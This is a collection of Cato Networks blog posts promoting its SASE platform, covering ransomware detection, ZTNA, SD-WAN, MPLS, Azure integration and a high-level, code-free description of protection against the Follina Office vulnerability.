SASE Core Requirements Comparison Chart Gartner SASE Requirements  Cato Appliance Solutions Cato SASE Advantage for Customers Converged Yes One single software stack with the network and security as one NO A mixed collection of appliances that are stitched together. Network and security simplicity and uniformity in policy enforcement can only be achieved through convergence. Cloud-Native Yes Built as a distributed cloud-native service from scratch, with no appliance baggage  NO Use virtualized hardware placed in the cloud Easy and inexpensive to scale when increased capacity is required. Customers can scale and grow at the speed of their business, and not be limited by the complexity of a stale network. Global Yes 75+ PoPs available located near every major business center. Each has an independent expansion plan.  Limited Relying on IaaS for hosting PoPs limits availability and degrades performance. Growth depends on IaaS plans, not the SASE vendor's Cato’s global private backbone delivers performance guarantees, resiliency and policy consistency between sites across the WAN and cloud. All Edges Yes Designed with light edge connectors (SD-WAN, SDP, Cloud) with a cloud first architecture to deliver same service to all edges Limited Delivering services to different edges requires a different portfolio solution. So, this is only achieved by stitching together portfolio products  Connecting and servicing all edges (branch, endpoint, data center, cloud) does not require complex configuration or integration Management Unified One console to control all SD-WAN, security, remote access, and networking policies with full analytics and visibility.  Self-service or managed service  No Multiple configuration interfaces to navigate  A single policy management app eliminates configuration gaps by ensuring consistent policy configurations & enforcement across the entire network.  About Cato Networks Cato is the world's first SASE platform, converging SD-WAN and network security into a global cloud-native service. Cato optimizes and secures application access for all users and locations. Using Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure brach Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever's next. For any questions about the ideas suggested in this article, and if you have some more of your own, feel free to contact us at: catonetworks.com/contact-us/

Cato’s Ransomware Lab Births Network-based Ransomware Prevention

As you might have heard, Cato introduced network-based ransomware protection today. Using machine learning algorithms and the deep network insight of the Cato SASE Cloud, we’re able to detect and prevent the spread of ransomware across networks without having to deploy endpoint agents. Infected machines are identified and immediately isolated for remediation. Of course, this...
Cato’s Ransomware Lab Births Network-based Ransomware Prevention As you might have heard, Cato introduced network-based ransomware protection today. Using machine learning algorithms and the deep network insight of the Cato SASE Cloud, we’re able to detect and prevent the spread of ransomware across networks without having to deploy endpoint agents. Infected machines are identified and immediately isolated for remediation. Of course, this isn’t our first foray into malware protection. Cato has a rich multilayered malware mitigation strategy of disrupting attacks across the MITRE ATT&CK framework. Cato’s antimalware engine prevents the distribution of malware in general. Cato IPS detects anomalous behaviors used throughout the cyber kill chain. Cato also uses IPS and AM to detect and prevent MITRE techniques used by common ransomware groups, which spot the attack before the impact phase. And, as part of this strategy, Cato security researchers follow the techniques used by ransomware groups, updating Cato’s defenses, and protecting enterprises against exploitation of known vulnerabilities in record time. [boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass"] Join one of our Cyber Security Masterclasses | Go now [/boxlink] What’s being introduced today are heuristic algorithms specifically designed to detect and interrupt ransomware. The machine-learning heuristic algorithms inspect live SMB traffic flows for a combination of network attributes including: File properties such as specific file names, file extensions, creation dates, and modification dates,Shared volumes access data such as metrics on users accessing remote folders,Network behavior such as creating certain files and moving across the network in particular ways, andTime intervals such as encrypting whole directories in seconds. Once found, Cato automatically blocks SMB traffic from the source device, preventing lateral movement or file encryption, and notifies the customer. The work comes out of our ransomware lab project that we started several months ago. The lab uses a standalone network within Cato where we reproduce ransomware infections in real-life organizations. “We execute them in the lab to understand how they do their encryptions, what file properties they change, and other parts of their operations and then we figure out how to optimize our heuristics to detect and prevent them,” says Tal Darsan, manager of managed security services at Cato. So far, the team has dug into more than dozen ransomware families, including Black Basta, Conti, and Avos Locker. To get a better sense of what our ransomware protections bring, check out the video below:  

How to Gradually Deploy SASE in an Enterprise

For decades, enterprises have been stuck on complex and rigid architecture that has prevented them from achieving business agility and outdoing their competition. But now they don’t have to. SASE (Secure Access Service Edge), was recognized by Gartner in 2019 as a new category that converges enterprise networking and security point solutions into a unified,...
How to Gradually Deploy SASE in an Enterprise For decades, enterprises have been stuck on complex and rigid architecture that has prevented them from achieving business agility and outdoing their competition. But now they don’t have to. SASE (Secure Access Service Edge), was recognized by Gartner in 2019 as a new category that converges enterprise networking and security point solutions into a unified, cloud-delivered service. Gartner predicts that “by 2025, at least 60% of enterprises will have explicit strategies and timelines for SASE adoption encompassing user, branch and edge access, up from 10% in 2020.”SASE converges networking and security into a single architecture that is: Cloud-nativeGlobally distributedSecureAnd covers all edges Enterprises can deploy SASE at the flip of a switch or gradually. In this blog post, we list five different gradual deployment use cases that enterprise IT can incorporate. For more detailed explanations, you can read the in-depth ebook that this blog post is based on, “SASE as a Gradual Deployment”. [boxlink link=”https://www.catonetworks.com/resources/5-questions-to-ask-your-sase-provider/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_questions_for_sase_provider”] 5 Questions to Ask Your SASE Provider | eBook [/boxlink] Use Case #1: MPLS Migration to SD-WAN SASE can support running MPLS alongside SD-WAN. In this first use case, enterprises leverage SASE’s SD-WAN functionalities, while turning off MPLS sites at their own schedule. Existing security and remote access solutions remain in place. Use Case #2: Optimize Global Connectivity SASE improves performance across global sites and WAN applications. Enterprises can use SASE for global connectivity and keep MPLS connections for critical WAN applications. Use Case #3: Secure Branch Internet Access SASE eliminates the need for edge security devices by including new technologies instead. For example, NGFW, IPS, ZTNA, and more. In this use case, MPLS is augmented with SASE security. Use Case #4: Cloud Acceleration and Control SASE’s global network of PoPs (Points of Presence) optimizes traffic in the network and to cloud data centers. Enterprises can leverage SASE instead of relying on the erratic Internet. Use Case #5: Remote Access SASE optimizes and secures remote traffic. By replacing VPNs with SASE, enterprises can ensure remote access to all edges through a secure network of global PoPs. Introducing Cato: The World’s First SASE Service Cato is the world’s first SASE platform, which supports gradual migration while connecting all network resources, including branches, mobile, remote employees, data centers, and more. Through a global and secure cloud-native network, Cato also offers: Managed threat detection and responseEvent discoveryIntelligent last-mile managementHands-free managementSo much more To learn more about MPLS to SASE deployment, read the ebook "SASE as a Gradual Deployment".

Your Post COVID Guide: Strategically Planning for the Hybrid Workforce

Until COVID-19, the majority of employees worked mainly from the office. But then, everything we knew was turned upside down, both professionally and personally. The workforce moved to and from the office, again and again, finally settling into a “hybrid workforce” reality. For IT teams, this abrupt change was unexpected. As a result, organizations did...
Your Post COVID Guide: Strategically Planning for the Hybrid Workforce Until COVID-19, the majority of employees worked mainly from the office. But then, everything we knew was turned upside down, both professionally and personally. The workforce moved to and from the office, again and again, finally settling into a “hybrid workforce” reality. For IT teams, this abrupt change was unexpected. As a result, organizations did not have the infrastructure in place required to support remote users. At first, IT teams tried to deal with the new situation by stacking up legacy VPN servers. But these appliances did not meet agility, security and scalability demands. Now, organizations need to find a different strategic solution to enable a productive hybrid workforce that can adapt to future changes. In this blog post, we cover the three main requirements of such a strategic solution and our technological recommendations for answering them. (For a more in-depth analysis, you can read the ebook “The Hybrid Workforce: Planning for the New Working Reality”, which this blog post is based on.) [boxlink link="https://www.catonetworks.com/resources/the-hybrid-workforce-planning-for-the-new-working-reality/?utm_source=blog&utm_medium=top_cta&utm_campaign=hybrid_workforce"] The Hybrid Workforce: Planning for the New Working Reality | EBOOK [/boxlink] Requirement #1: Seamless Transition Between Home and Office Most traditional infrastructure, namely MPLS, SD-WAN and NGFW/UTM, is focused on the office. However, there is no infrastructure that extends to remote work and home environments. This extension is required to enable a remote workforce. Solution #1: ZTNA and SASE ZTNA (Zero Trust Network Access) and SASE (Secure Access Service Edge) decouple network and security capabilities from physical appliances. Instead, they provide them in the cloud. This solution converges all infrastructure into a single platform that is available to everyone, everywhere. Requirement #2: Scalable and Globally Distributed Remote Access Today’s VPNs are appliance-centric, making them resource-intensive when scaling and maintaining them. Solution #2: Remote Access as a Service A global cloud service can provide remote access to a significant user base. This will free up IT resources for infrastructure management. Requirement #3: Optimization and Security for All Traffic Having remote access is not enough. Teams also need traffic optimization and security for performance and preventing breaches. Solution #3: A Single Solution for All Needs Some remote access solutions include optimization and security for all traffic types. This can be done through WAN optimization, cloud acceleration and threat prevention. Next Steps A global and agile network and security infrastructure can serve your hybrid workforce and help you prepare for whatever is next. Read the ebook to learn how.

How to Succeed as a CIO in 100 Days

A CIO position is exciting but also challenging, especially if it’s your first role… And, if you don’t plan what you want to accomplish, you might find yourself putting out fires or chasing your own tail. Learn how to navigate the first 100 days of your important new role, in our helpful online guide. Use...
How to Succeed as a CIO in 100 Days A CIO position is exciting but also challenging, especially if it’s your first role... And, if you don’t plan what you want to accomplish, you might find yourself putting out fires or chasing your own tail. Learn how to navigate the first 100 days of your important new role, in our helpful online guide. Use it to achieve professional success and establish your position as an invaluable business leader. (And, for more in-depth explanations, tips and stats, check out the e-book this blog post is based on.) Phase 1: Get to Know the Organization and the Team (3 weeks) The first step at a new company is to get to know the people and learn the company culture. Spend time with your team, stakeholders and company leadership. Use this opportunity to learn about the business, IT’s contribution and where IT fits in the business’s future goals. During these talks, map out any potential gaps or weaknesses you can identify. To see example questions to ask during these sessions, check out the eBook. Phase 2: Learn the IT and Security Infrastructure (3 weeks) Once you’ve understood the expectations from your department, it’s time to learn the network infrastructure and architecture. Take scope of: Technologies in use Potential hazards SLAs The delivery model Existing processes On-site and off-site work Digital transformation status Vendors Similar to phase one, start mapping out any network strengths and weaknesses. [boxlink link="https://www.catonetworks.com/resources/your-first-100-days-as-cio-5-steps-to-success/?utm_source=blog&utm_medium=top_cta&utm_campaign=first_100_days_cio"] Your First 100 Days as CIO: 5 Steps to Success | EBOOK [/boxlink] Phase 3: Set a Strategy and Goals (2 weeks) Finally, now is the time to determine your strategy for the upcoming year. Organize your notes from phases 1 and 2. Research new technologies, tools, trends and capabilities that could be relevant to your industry and requirements. Map out your department’s strengths, weaknesses, threats and opportunities. Determine your vision and mission statement. Define your objectives. Phase 4: Incorporate Digital Transformation (2 weeks) According to McKinsey Global, following Covid-19, companies are accelerating digitization by three to seven years, acting even 40 times faster than expected! This means that CIOs who want to be perceived as future leaders need to keep up to date with digital technologies. Look beyond traditional architectures and into trends like cloudification, convergence and mobility. According to Lars Norling, Director of IT Operations from ADB Safegate “Our analysis clearly showed the shift in the IT landscape, namely extended mobility and the move towards providing core services as cloud services. This led us to look outside of the box, beyond traditional WAN architectures.” Gartner identifies SASE (Secure Access Service Edge) as the leading transformative technology today. SASE converges network and security into one global cloud service while reducing IT overhead, ensuring speed and performance and incorporating the latest security solutions. Phase 5: Set Priorities (2 weeks) Are you excited to get started on executing your plan? It’s almost time to do so. But first, prioritize the activities you want to take on, based on business requirements, ROI, urgency and risks. Day 101 The steps above are intended to help you make days 101 and onwards a smashing success. So go over your plans, take a deep breath and get started. Good luck! To learn more about digital transformation and SASE, let’s talk. Read more about your first 100 days in the ebook, “Your First 100 Days as CIO: 5 Steps to Success”.

ZTNA Alone is Not Enough to Secure the Enterprise Network

ZTNA is a Good Start for Security Zero trust has become the new buzzword in cybersecurity, and for good reason. Traditional, perimeter-focused security models leave the organization vulnerable to attack and are ill-suited to the modern distributed enterprise. Zero trust, which retracts the “perimeter” to a single asset, provides better security and access management for...
ZTNA Alone is Not Enough to Secure the Enterprise Network ZTNA is a Good Start for Security Zero trust has become the new buzzword in cybersecurity, and for good reason. Traditional, perimeter-focused security models leave the organization vulnerable to attack and are ill-suited to the modern distributed enterprise. Zero trust, which retracts the “perimeter” to a single asset, provides better security and access management for corporate IT resources regardless of their deployment location. In many cases, zero trust network access (ZTNA) is an organization’s first step on its zero trust journey. ZTNA replaces virtual private networks (VPNs), which provide a legitimate user with unrestricted access to the enterprise network. In contrast, ZTNA makes case-by-case access determinations based on access controls. If a user has legitimate access to a particular resource, then they are given access to that resource for the duration of the current session. However, accessing any other resources or accessing the same resource as part of a new session requires re-verification of the user’s access. The shift from unrestricted access to case-by-case access on a limited basis provides an important first step towards implementing an effective zero trust security strategy. Adopting ZTNA Alone Is Not Enough The purpose of ZTNA is to prevent illegitimate access to an organization’s IT resources. If a legitimate user account attempts to access a resource for which they lack the proper permissions, then that access request is denied. This assumes that all threats originate from outside the organization or from users attempting to access resources for which they are not authorized. However, several scenarios exist in which limiting access to authorized accounts does not prevent attacks. [boxlink link="https://www.catonetworks.com/resources/ztna-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=ztna_demo"] Secure zero trust access to any user in minutes | ZTNA Demo [/boxlink] Compromised or Malicious Accounts ZTNA limits access to corporate resources to accounts that have a legitimate need for that access. However, an account with legitimate access can be abused to perform an attack. One of the most common cyberattacks is credential stuffing attacks in which an attacker tries to use a certain individual’s compromised credentials for one account to log into another account. If successful, the attacker has access to an account with legitimate access whose requests may be accepted by a ZTNA solution. If this is the case, then an attacker can use this compromised account to steal sensitive data, plant malware, or perform other malicious actions. Additionally, not all threats originate from outside of the organization. An employee could cause a data breach either via negligence or intentionally. For example, 29% of employees admit to taking company data with them when leaving a job. Legitimate users could also accidentally deploy malware on the corporate network. In 2021, 80% of ransomware was self-installed, meaning that the user opened or executed a malicious file that installed the malware. If this occurred on the corporate network, it would be within the context of a legitimate user account. Infected Devices Users access corporate resources via computers or mobile devices. While a ZTNA solution may be configured to look for a combination of a user account and a known device, this device may not be trustworthy. Devices infected with malware may attempt to take advantage of a user’s account and assigned permissions to gain access to the corporate network or other resources. If malware is installed on a user’s device, it may spread to the corporate network via legitimate accounts. ZTNA’s access control policies alone are not enough to protect against infected devices. Solutions also need to include device posture monitoring to provide more information about the risk posed by a particular device. Common device posture monitoring features include identifying the security tools running on the device, the current patch level, and compliance with corporate security policies. Ideally, a ZTNA solution should provide the ability to tune device posture access requirements based on the requested resources and to incorporate other valuable information, such as the device OS and location. ZTNA Should Be Deployed as Part of SASE ZTNA is an invaluable tool for providing secure remote access to corporate resources. Its integrated access controls and case-by-case grants of access offer far greater security than a VPN. However, as mentioned above, ZTNA is not enough to implement zero trust security or to effectively secure an organization’s network and resources against attack. An attacker with access to a legitimate account - via compromised credentials or an infected device - may be granted access to corporate IT assets. Effective zero trust security requires partnering ZTNA’s access control with security solutions capable of identifying and preventing abuse of a legitimate user account. Next-generation firewalls (NGFWs), intrusion prevention systems (IPS), cloud access security brokers, and other solutions can help to address the threats that ZTNA misses. These capabilities can be deployed as standalone solutions, but this often results in a tradeoff between performance and security. Deploying perimeter-based defenses requires routing traffic through that perimeter, which adds unacceptable latency. On the other hand, most organizations lack the resources to deploy a full security stack at all of their on-prem and cloud-based service locations. Secure Access Service Edge (SASE) provides enterprise-grade security without sacrificing network performance. By integrating a full network security stack into a single solution, SASE enables optimized performance by ensuring that expensive operations - such as decrypting a traffic stream for analysis - are only performed once. Its integrated network optimization capabilities and cloud-based deployment ensure high network performance and reliability, especially when backed by Cato’s network of dedicated backbone links between PoPs. ZTNA as a standalone solution doesn’t meet corporate network security goals or business requirements. Deploying ZTNA as part of a SASE solution is the right choice for organizations looking to effectively implement zero trust.

Cato Protects Against Microsoft Office Follina Exploits

Cybersecurity researchers are lighting up Twitter with a zero-day flaw in Microsoft Office enabling attackers to execute arbitrary code on targeted Windows systems. Earlier today Microsoft issued CVE-2022-30190 that describes the remote code execution (RCE) vulnerability within Office. It can be exploited when the Microsoft Support Diagnostic Tool (MSDT) is called using by a URL...
Cato Protects Against Microsoft Office Follina Exploits Cybersecurity researchers are lighting up Twitter with a zero-day flaw in Microsoft Office enabling attackers to execute arbitrary code on targeted Windows systems. Earlier today Microsoft issued CVE-2022-30190 that describes the remote code execution (RCE) vulnerability within Office. It can be exploited when the Microsoft Support Diagnostic Tool (MSDT) is called using by a URL from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights. The vulnerability was discovered by nao_sec, the independent cybersecurity research team, who found a Word document ("05-2022-0438.doc") uploaded to VirusTotal from an IP address in Belarus. The Microsoft post explained how to create the payload and various work arounds. Describing the vulnerability, nao_sec writes on Twitter, “It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code." The Hackernews quotes security researcher Kevin Beaumont, saying that “the maldoc leverages Word's remote template feature to fetch an HTML file from a server, which then makes use of the "ms-msdt://" URI scheme to run the malicious payload.” Beaumont has dubbed the flaw "Follina," because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso. [boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass"] Join one of our Cyber Security Masterclasses | Go now [/boxlink] Cato Immediately Protects Users Worldwide Within hours of Microsoft’s reporting, Cato researchers were already working on implementing protections for Cato customers worldwide. Already, Cato’s multilayered security defense fully protected Cato-connected users. While no further action is needed, Cato customers are advised to patch any affected systems. There are currently three ways attackers can exploit this attack: Users can download a file or application containing the payload that will invoke the MSDT locally. Users can download a file or application containing the payload that will get the invocation from the Internet (from the attacker’s sites) User’s browser receives the payload in the response to direction from a malicious site, runs MSDT. All three approaches are already blocked using the Cato Advanced Threat Prevention (ATP) capabilities. Cato’s anti-malware inspects and will block downloading of files or applications with the necessary payload to execute Follina. Cato IPS will detect and prevent any invocation from across the network or the Internet. As we have witnessed with Log4j, vulnerabilities such as these can take organizations a very long time to patch. Log4j exploitations are still observed to this day, six months after its initial disclosure. With Cato, enterprises no longer see the delays from patching and are protected in record time. Demonstration of Attack Exploiting CVE-2022-30190 

What Others Won’t Tell You About MPLS

MPLS (Multiprotocol Label Switching) has been an industry-standard in enterprise networking for decades. But with modern enterprises relying more and more on public cloud services like Office 365, Salesforce and SAP Cloud, is MPLS enough? Perhaps there’s another solution that can meet the capacity, security, and agility requirements of the next-generation enterprise network. 5 Considerations...
What Others Won’t Tell You About MPLS MPLS (Multiprotocol Label Switching) has been an industry-standard in enterprise networking for decades. But with modern enterprises relying more and more on public cloud services like Office 365, Salesforce and SAP Cloud, is MPLS enough? Perhaps there’s another solution that can meet the capacity, security, and agility requirements of the next-generation enterprise network. 5 Considerations for Evaluating MPLS and Its Alternatives 1. Agility: Can Your Network Move at the Speed of Business? Modern enterprises need a solution that enables them to expand their business quickly and connect new sites to their existing networks. But traditional MPLS requires rolling out permanent infrastructure, which can take months and keeps businesses dependent on telco service and support. 2. Cost: Is Your Cost Per Megabit Too High? The modern enterprise network is internet-bound, which makes it bandwidth-intensive. Enterprises need a solution that is priced in an internet-friendly manner since counting every megabit is counter-productive. But MPLS costs are megabit-based, and each megabit is pricey. Redundant circuits, resilient routing and WAN optimization drive the bill even higher. 3. Flexibility: Can The Business Transition Between On and Off-site Work? New, post-pandemic workplaces have to be able to automatically transition between remote and on-site work. But in case of connectivity issues, transitioning to MPLS backups could cause significant delays that impede productivity. 4. Security: Can Enterprise Users Access Resources Anywhere? To support remote work and a distributed workforce, resources, users, data and applications need to be secured wherever they are. But MPLS VPNs are hard to manage and backhauling traffic to the data centers adds latency, making the network vulnerable. 5. Management: Do You Have Visibility and Control of Your Network? Modern businesses need co-managed networks so they can have visibility and control without having to take care of all the heavy lifting. But MPLS requires businesses to control the entire network or hand it all over to telcos. [boxlink link="https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls/?utm_source=blog&utm_medium=top_cta&utm_campaign=other_mpls"] What Others Won’t Tell You About MPLS | Download eBook [/boxlink] Is SD-WAN the Solution for MPLS’s Shortcomings? SD-WAN can replace some types of MPLS traffic, saving businesses from many of MPLS’ costs. However, MPLS doesn’t answer all business needs, including: Cloud - SD-WAN focuses on physical WAN. Security - SD-WAN employs only basic security features. Remote and Hybrid Work - SD-WAN is a branch-oriented solution that cannot support remote work on its own. Visibility - SD-WAN requires adding more vendors, which creates fragmented visibility. How SASE Answers All Future WAN Needs The solution for all future enterprise network needs is a converged solution that includes SD-WAN, a global backbone, pervasive security, and remote access in a single cloud offering. A SASE platform offers just that: A single platform for all capabilities, which can be activated separately at the flip of a switch. A global WAN backbone over the cloud, ensuring traffic runs smoothly with minimal latency across global PoPs. A unified security-as-a-service engine by converging ZTNA with SD-WAN. A single pane of glass for all policies, configurations, monitoring, and analytics. Flexible management - self-service, co-managed, or fully managed. Read more about MPLS vs. SASE in the complete eBook, What Others Won’t Tell You About MPLS.

Azure SD-WAN: Cloud Datacenter Integration with Cato Networks

As critical applications migrate into Microsoft Azure, enterprises are challenged with building a WAN that can deliver the necessary cloud performance without dramatically increasing costs and complexity. There’s been no good approach to building an Azure SD-WAN — until now. Cato’s approach to Azure SD-WAN improves performance AND simplifies security, affordably. Let’s see how. Azure...
Azure SD-WAN: Cloud Datacenter Integration with Cato Networks As critical applications migrate into Microsoft Azure, enterprises are challenged with building a WAN that can deliver the necessary cloud performance without dramatically increasing costs and complexity. There’s been no good approach to building an Azure SD-WAN — until now. Cato’s approach to Azure SD-WAN improves performance AND simplifies security, affordably. Let’s see how. Azure SD-WAN’s MPLS and SD-WAN Problem When organizations start relying on Azure, two problems become increasingly apparent. First, how do you secure your Azure instance? Running virtual firewalls in Azure adds complexity and considerable expense, necessitating purchase of additional cloud compute resources and third-party licenses. What’s more, virtual firewalls are limited in capacity, requiring upgrades as traffic grows. Cloud performance may suddenly decline because the firewall is choking the network. Adding other cloud instances requires additional tools, complicating operations. You can continue to rely on your centralized security gateway, backhauling traffic from branch office inspection by the gateway before sending the traffic across the Internet to Azure. You can even improve the connection between the gateway and Azure with a premium connectivity service, such as Azure ExpressRoute. But, and here’s the second issue, how do you deal with the connectivity problem? Branch offices that might otherwise be a short hop away from an Azure entrance point must now send traffic back to the centralized gateway for inspection before reaching Azure. The approach does nothing for mobile users who sit off the MPLS network regardless. And what happens as your cloud strategy evolves and you add other cloud datacenter services, such as Amazon AWS or Google Cloud? Now you need a whole new set of security and connectivity solutions adding even more cost and complexity. Nor does edge SD-WAN help. There’s no security built into edge SD-WAN, so you haven’t addressed that problem. There’s also no private global network so you’re still reliant on MPLS for predicable connectivity. Edge SD-WAN solutions also require the cost and complexity of deploying additional edge SD-WAN appliances to connect to the Azure cloud. And, again, none of this helps with mobile users, which are also out of scope for edge SD-WAN. [boxlink link="https://www.catonetworks.com/resources/4-ways-to-connect-to-and-secure-your-cloud-datacenters/?utm_source=blog&utm_medium=top_cta&utm_campaign=cloud_datacenter"] 4 Ways to Connect to and Secure Your Cloud Datacenters | Download eBook [/boxlink] How Azure SD-WAN Works to Connect Cato and Azure Cato addresses all of the connectivity and security challenges of Azure SD-WAN. Cato’s global private backbone spans more than 75+ points of presence (PoPs) across the globe, providing affordable premium connectivity worldwide. Many of those Cato PoPs collocate within the same physical datacenters as entrance points to Azure. Connecting from Azure to Cato is only matter of crossing a fast, LAN connection, giving Cato customers ExpressRoute-like performance at no additional charge. To take advantage of Cato’s unique approach, Cato customers do two things. First, to connect Cato and Azure, enterprises take advantage of our agentless configuration, establishing IPsec tunnels between the two services, establishing the PoP as the egress point for Azure traffic. There’s no need to deploy additional agents or virtual appliances. Cato’s will then optimize and route Azure traffic from any Cato PoP along the shortest and fastest path across Cato Cloud to destination PoP. Second, sites and mobile users send their Azure traffic to Cato by establishing encrypted tunnels across any Internet connection to the nearest Cato PoP. Sites will run a Cato Socket, Cato’s SD-WAN appliance or establish IPsec tunnels from an existing third-party security device, and mobile users run the Cato mobile client on their devices. Alternatively, if you’d like to leverage all of Cato’s SD-WAN capabilities in Azure, you can easily deploy Cato’s virtual socket instead of IPsec tunnels, which includes automatic PoP selection, high availability, and automatic failover. The beauty of Cato’s virtual socket is that you can easily deploy it in minutes instead of hours. To get started with Cato virtual socket, search for Cato Networks in the Azure marketplace. Then, click Get It Now, and follow the outlined configuration guidelines. How Azure SD-WAN Secures Azure Resources In addition to connectivity, Cato’s Azure SD-WAN solution secures cloud resources against network-based threats. Every Cato PoP provides Cato’s complete suite of security services, eliminating the need for backhauling. Cato Security as a Service is a fully managed suite of enterprise-grade and agile network security capabilities, that currently includes application-aware next-generation firewall-as-a-Service (FWaaS), secure web gateway with URL filtering (SWG), standard and next-generation anti-malware (NGAM), IPS-as-a-Service (IPS), and Cloud Access Security Broker (CASB). Cato can further secure your network with a comprehensive Managed Threat Detection and Response (MDR) service to detect compromised endpoints. Azure instances and all resources connected to Cato, including site, mobile users and other cloud resources, are protected through a common set of security policies, avoiding the complexity that comes with purchasing security tools unique to Azure or other cloud environments. Azure SD-WAN Benefits The bottom line is that Azure SD-WAN delivers connectivity and security with minimal complexity and cost: Superior Microsoft Azure performance The combination of global Cato PoPs, a global private backbone and Microsoft Azure colocation accelerates Microsoft Azure application performance by up to 20X vs. a typical corporate Internet-based connection. Not only is latency minimized but Cato’s built-in network optimizations further improve data transfer throughput. And all of that is done for branch offices as well as mobile users. The result is a superior user experience without the need for premium cloud provider transport services. Security and deployment simplicity With Cato, organizations don’t have to size, procure and manage scores of branch security solutions normally needed for the direct Internet access critical to delivering low latency cloud connectivity. Security is built into Cato Cloud; cloud resources are protected by the same security policy set as any other resource or user on the enterprise backbone. Cato’s agentless configuration also means customers don’t have to install additional SD-WAN appliances in the Azure cloud. These benefits are particularly significant for multi-cloud enabled organizations which normally would require separate connectivity solutions for each private datacenter service. (However, if you’d like to leverage additional capabilities in Azure, you can deploy the integration in minutes with Cato’s virtual Socket.) Networking and security agility Cato’s SD-WAN’s simplicity, Azure integration, and built-in security stack enable branch offices and mobile users to get connected to Microsoft Azure in minutes or hours vs. weeks or months for branch office appliance-based SD-WAN. Affordable and fast ROI Enterprises get superior cloud performance without paying for the high-cost cost of branch office SD-WAN hardware, carrier SD-WAN services, or Microsoft Azure ExpressRoute transport. Nor do companies need to invest in additional security services to protect cloud resources with Cato. For more information on how Cato integrates with the cloud, contact Cato Networks or check out this eBook on four ways to connect and secure your cloud data center.

The Only SASE RFP Template You’ll Ever Need

Why do you need a SASE RFP? Shopping for a SASE solution isn’t as easy as it sounds… SASE is an enterprise networking and security framework that is relatively new to the enterprise IT market (introduced by Gartner in 2019.) And less than 3 years young, SASE is often prone to misunderstanding and vendor “marketecture.”...
The Only SASE RFP Template You’ll Ever Need Why do you need a SASE RFP? Shopping for a SASE solution isn’t as easy as it sounds... SASE is an enterprise networking and security framework that is relatively new to the enterprise IT market (introduced by Gartner in 2019.) And less than 3 years young, SASE is often prone to misunderstanding and vendor “marketecture.” Meaning: If you don’t ask the right questions during your sales and vendor evaluation process, you may be locked into a solution that doesn’t align with your current and future business and technology needs. A Quick Note about Cato’s RFP Template Do a quick Google search and you’ll find millions of general RFP templates. That being said, Cato’s RFP template only covers the functional requirements of a future SASE deployment. There are no generic RFP requirements in our template, like getting the vendor details of your vendor companies. So, What Must a SASE RFP Template Include? Cato Networks has created a comprehensive, 13-page SASE RFP template, which contains all business and functional requirements for a full SASE deployment. Just download the template, fill in the relevant sections to your enterprise, and allow your short-listed vendors to fill in the remainder. While you may see some sections that are not relevant to your particular organization or use case, that's all right. It’s available for your reference, and to help you plan any future projects. A Sneak Peek at Cato’s RFP Template If you’d like a preview of Cato Networks’ SASE RFP template, we’re providing you with a high-level outline. Take a look at this "quick-guide", and then download the full SASE RFP template to put it into practice. [boxlink link="https://www.catonetworks.com/resources/sase-rfi-rfp-template/?utm_source=blog&utm_medium=top_cta&utm_campaign=sase_rfp_template"] SASE RFI/RFP Made Easy | Get the Template [/boxlink] 1. Business and IT overview You’ll describe your business and IT. Make sure to include enough details for vendors to understand your environment so they can tailor their answers to your specific needs and answer why their solution is valuable to your use case. 2. Solution Architecture Understand your proposed vendors architecture, what the architecture includes, what it does and where it is placed (branch, device, cloud.) Comprehending vendor architecture will allow you to better determine how a vendor scales, how they address failures, deliver resiliency, etc. 3. Solution Capabilities Deep dive into your proposed vendor functionalities. The idea is to select all selections relevant to your proposed SASE deployment, and have the vendor fill them out. SD-WAN Receive a thorough exploration of a proposed vendor’s SD-WAN offering, covering link management, traffic routing and QoS, voice and latency-sensitive traffic, throughput and edge devices, monitoring and reporting, site provisioning, gradual deployment / co-existence with legacy MPLS networks. Security Understand traffic encryption, threat prevention, threat detection, branch, cloud and mobile security, identity and user awareness, policy management and enforcement, as well as security management analytics and reporting. Cloud Determine vendor components needed to connect a cloud datacenter to the network, amongst other areas. Mobile (SDP / ZTNA) Understand how vendors connect a mobile user to the network, their available mobile solutions for connecting mobile users to WAN and cloud, and other key areas. Global Explore your vendor’s global traffic optimization, describe how they optime network support to mobile users, and more. 4. Support and Services Evaluate service offering and managed services. This is the perfect time to ask and understand whether your proposed vendor uses “follow-the-sun" support models and decide whether you want a self-managed, fully managed, or co-managed service. Support and Professional services Understand if vendors abide by “follow-the-sun,” support, their hours of support and more. Managed Services Get a sense of vendor managed services in several key areas. Next Steps: Get the Full SASE RFP / RFI Template Whether you’re new to SASE or a seasoned expert, successful SASE vendor selection starts with asking the right questions. When you know the correct questions to ask, it’s easy to understand if a SASE offering can meet the needs of your organization both now and in the future. Download Cato Network’s full SASE RFP / RFI Made Easy Template, to begin your SASE success story.

Don’t Ruin ZTNA by Planning for the Past

Zero trust network access (ZTNA) is an integral part of an enterprise security strategy, as companies move to adopt zero trust security principles and adapt to more distributed IT environments. Legacy solutions such as virtual private networks (VPNs) are ill-suited to the distributed enterprise and do not provide the granular access controls necessary to protect...
